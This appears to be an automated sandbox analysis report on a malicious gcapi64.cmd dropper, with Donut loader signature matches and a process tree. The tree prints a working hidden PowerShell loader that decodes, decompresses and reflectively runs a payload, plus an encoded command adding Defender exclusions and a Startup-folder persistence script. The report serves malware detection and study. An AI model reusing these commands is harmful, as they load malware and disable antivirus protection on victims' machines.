                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 20.2.gcapi64.cmd.Kwj.183bccbaa98.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: 00000014.00000002.2328831469.00000183BCCBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: 00000015.00000002.2410284872.000001C9C3F00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: 00000014.00000002.2107099890.00000183AC193000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: 00000005.00000002.1852130887.00000258253A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: 00000005.00000002.1996056904.0000025836652000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: Process Memory Space: gcapi64.cmd.Kwj PID: 7544, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: gcapi64.cmd.Kwj PID: 2640, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjCode function: 5_2_00007FFD9B7924C95_2_00007FFD9B7924C9
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjCode function: 5_2_00007FFD9BA01B505_2_00007FFD9BA01B50
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjCode function: 5_2_00007FFD9BA16CAD5_2_00007FFD9BA16CAD
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjCode function: 5_2_00007FFD9BA07AF85_2_00007FFD9BA07AF8
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjCode function: 5_2_00007FFD9BA035605_2_00007FFD9BA03560
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B7B2E646_2_00007FFD9B7B2E64
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeCode function: 10_2_00007FFD9B770DDE10_2_00007FFD9B770DDE
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeCode function: 10_2_00007FFD9B77090A10_2_00007FFD9B77090A
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeCode function: 10_2_00007FFD9B7710C610_2_00007FFD9B7710C6
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeCode function: 10_2_00007FFD9B770E2C10_2_00007FFD9B770E2C
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeCode function: 10_2_00007FFD9B7714E110_2_00007FFD9B7714E1
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeCode function: 10_2_00007FFD9B7710F310_2_00007FFD9B7710F3
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeCode function: 10_2_00007FFD9B84368110_2_00007FFD9B843681
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeCode function: 10_2_00007FFD9B84312110_2_00007FFD9B843121
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeCode function: 10_2_00007FFD9B84414510_2_00007FFD9B844145
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeCode function: 10_2_00007FFD9B8443D010_2_00007FFD9B8443D0
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeCode function: 10_2_00007FFD9B8442B810_2_00007FFD9B8442B8
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeCode function: 10_2_00007FFD9B8E9EAD10_2_00007FFD9B8E9EAD
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeCode function: 10_2_00007FFD9B8EA53D10_2_00007FFD9B8EA53D
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjCode function: 20_2_00007FFD9BA18A7920_2_00007FFD9BA18A79
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjCode function: 20_2_00007FFD9BA110A020_2_00007FFD9BA110A0
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjCode function: 20_2_00007FFD9BA12AB020_2_00007FFD9BA12AB0
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjCode function: 20_2_00007FFD9BA110B020_2_00007FFD9BA110B0
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeCode function: 21_2_000001C9C3FAAF9C21_2_000001C9C3FAAF9C
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeCode function: 21_2_000001C9C3FAB37821_2_000001C9C3FAB378
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeCode function: 21_2_000001C9C3FAB7A821_2_000001C9C3FAB7A8
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeCode function: 21_2_000001C9C3FAC25C21_2_000001C9C3FAC25C
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeCode function: 21_2_000001C9C3FAEA5421_2_000001C9C3FAEA54
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeCode function: 21_2_000001C9C3FAA0C021_2_000001C9C3FAA0C0
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeCode function: 21_2_00007FFD9B760D6521_2_00007FFD9B760D65
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeCode function: 21_2_00007FFD9B76090A21_2_00007FFD9B76090A
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeCode function: 21_2_00007FFD9B7610C621_2_00007FFD9B7610C6
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeCode function: 21_2_00007FFD9B760DDE21_2_00007FFD9B760DDE
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeCode function: 21_2_00007FFD9B760E2C21_2_00007FFD9B760E2C
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeCode function: 21_2_00007FFD9B7614E121_2_00007FFD9B7614E1
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeCode function: 21_2_00007FFD9B830F0421_2_00007FFD9B830F04
                    Source: gcapi64.cmd.Kwj, 00000005.00000002.1852130887.0000025825208000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs gcapi64.cmd
                    Source: gcapi64.cmd.Kwj, 00000005.00000002.1843288905.00000258231B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs gcapi64.cmd
                    Source: gcapi64.cmd.Kwj, 00000005.00000002.1852130887.0000025825B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs gcapi64.cmd
                    Source: gcapi64.cmd.Kwj, 00000005.00000002.2066486416.000002583D63F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs gcapi64.cmd
                    Source: gcapi64.cmd.Kwj, 00000005.00000002.2082739360.000002583DE30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs gcapi64.cmd
                    Source: gcapi64.cmd.Kwj, 00000005.00000000.1656144337.00007FF67B7B9000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs gcapi64.cmd
                    Source: gcapi64.cmd.Kwj, 00000005.00000002.1996056904.00000258351F4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs gcapi64.cmd
                    Source: gcapi64.cmd.Kwj, 00000005.00000002.2065678749.000002583D520000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs gcapi64.cmd
                    Source: gcapi64.cmd.Kwj, 00000005.00000002.1852130887.0000025825181000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs gcapi64.cmd
                    Source: gcapi64.cmd.Kwj, 00000005.00000002.1996056904.000002583547D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs gcapi64.cmd
                    Source: gcapi64.cmd.Kwj, 00000005.00000002.1996056904.0000025835E1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFjaqi.exe, vs gcapi64.cmd
                    Source: gcapi64.cmd.Kwj, 00000014.00000002.2328831469.00000183BCCBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs gcapi64.cmd
                    Source: gcapi64.cmd.Kwj, 00000014.00000002.2328831469.00000183BBC10000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs gcapi64.cmd
                    Source: gcapi64.cmd.Kwj, 00000014.00000002.2107099890.00000183ABB81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs gcapi64.cmd
                    Source: gcapi64.cmd.Kwj, 00000014.00000002.2107099890.00000183ABC00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs gcapi64.cmd
                    Source: gcapi64.cmd.Kwj, 00000014.00000002.2107099890.00000183AC6EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs gcapi64.cmd
                    Source: gcapi64.cmd.Kwj, 00000014.00000002.2099849995.00000183A9C2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs gcapi64.cmd
                    Source: gcapi64.cmd.Kwj.18.drBinary or memory string: OriginalFilenamePowerShell.EXEj% vs gcapi64.cmd
                    Source: gcapi64.cmd.Kwj.3.drBinary or memory string: OriginalFilenamePowerShell.EXEj% vs gcapi64.cmd
                    Source: 20.2.gcapi64.cmd.Kwj.183bccbaa98.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                    Source: 00000014.00000002.2328831469.00000183BCCBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                    Source: 00000015.00000002.2410284872.000001C9C3F00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                    Source: 00000014.00000002.2107099890.00000183AC193000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                    Source: 00000005.00000002.1852130887.00000258253A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                    Source: 00000005.00000002.1996056904.0000025836652000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                    Source: Process Memory Space: gcapi64.cmd.Kwj PID: 7544, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: gcapi64.cmd.Kwj PID: 2640, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: 5.2.gcapi64.cmd.Kwj.25835b0c998.3.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 5.2.gcapi64.cmd.Kwj.25835b0c998.3.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 5.2.gcapi64.cmd.Kwj.25835b0c998.3.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                    Source: 5.2.gcapi64.cmd.Kwj.25835b0c998.3.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                    Source: 5.2.gcapi64.cmd.Kwj.258353cb6b0.5.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 5.2.gcapi64.cmd.Kwj.258353cb6b0.5.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 5.2.gcapi64.cmd.Kwj.25835b0c998.3.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 5.2.gcapi64.cmd.Kwj.25835b0c998.3.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 5.2.gcapi64.cmd.Kwj.25835b0c998.3.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 5.2.gcapi64.cmd.Kwj.25835b0c998.3.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 5.2.gcapi64.cmd.Kwj.2583de30000.11.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 5.2.gcapi64.cmd.Kwj.258353cb6b0.5.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 5.2.gcapi64.cmd.Kwj.2583de30000.11.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 5.2.gcapi64.cmd.Kwj.2583de30000.11.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 5.2.gcapi64.cmd.Kwj.2583de30000.11.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 5.2.gcapi64.cmd.Kwj.25835b0c998.3.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 5.2.gcapi64.cmd.Kwj.258353cb6b0.5.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 5.2.gcapi64.cmd.Kwj.2583de30000.11.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 5.2.gcapi64.cmd.Kwj.258353cb6b0.5.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 5.2.gcapi64.cmd.Kwj.258353cb6b0.5.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 5.2.gcapi64.cmd.Kwj.25835b0c998.3.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 5.2.gcapi64.cmd.Kwj.258353cb6b0.5.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 5.2.gcapi64.cmd.Kwj.2583de30000.11.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 5.2.gcapi64.cmd.Kwj.258353cb6b0.5.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: classification engineClassification label: mal100.expl.evad.winCMD@33/16@1/1
                    Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\Desktop\gcapi64.cmd.KwjJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4428:120:WilError_03
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeMutant created: NULL
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeMutant created: \Sessions\1\BaseNamedObjects\f7de704b9889b0df737152
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7452:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8064:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7768:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7092:120:WilError_03
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeMutant created: \Sessions\1\BaseNamedObjects\bc7d05a27e1103d120a05e56fc0e8135
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ouhvmtyj.kyc.ps1Jump to behavior
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gcapi64.vbs"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Windows\System32\xcopy.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: gcapi64.cmdVirustotal: Detection: 18%
                    Source: gcapi64.cmdReversingLabs: Detection: 13%
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjFile read: C:\Users\user\Desktop\gcapi64.cmdJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\gcapi64.cmd" "
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\gcapi64.cmd.Kwj
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\Desktop\gcapi64.cmd.Kwj
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\gcapi64.cmd.Kwj C:\Users\user\Desktop\gcapi64.cmd.Kwj -WindowStyle hidden -command "$Tcvpdxwib = get-content 'C:\Users\user\Desktop\gcapi64.cmd' | Select-Object -Last 1; $Eyuktr = [System.Convert]::FromBase64String($Tcvpdxwib);$Qtrqzlhpxt = New-Object System.IO.MemoryStream( , $Eyuktr );$Ibywdtdu = New-Object System.IO.MemoryStream;$Reymjtc = New-Object System.IO.Compression.GzipStream $Qtrqzlhpxt, ([IO.Compression.CompressionMode]::Decompress);$Reymjtc.CopyTo( $Ibywdtdu );$Reymjtc.Close();$Qtrqzlhpxt.Close();[byte[]] $Eyuktr = $Ibywdtdu.ToArray();[Array]::Reverse($Eyuktr); $Xxwiev = [System.Threading.Thread]::GetDomain().Load($Eyuktr); $Krabry = $Xxwiev.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Krabry.DeclaringType, $Krabry.Name).DynamicInvoke() | Out-Null"
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEQAZQBzAGsAdABvAHAAXABnAGMAYQBwAGkANgA0AC4AYwBtAGQAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABEAGUAcwBrAHQAbwBwAFwAZwBjAGEAcABpADYANAAuAGMAbQBkADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAZwBjAGEAcABpADYANAAuAGMAbQBkADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABnAGMAYQBwAGkANgA0AC4AYwBtAGQA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gcapi64.vbs"
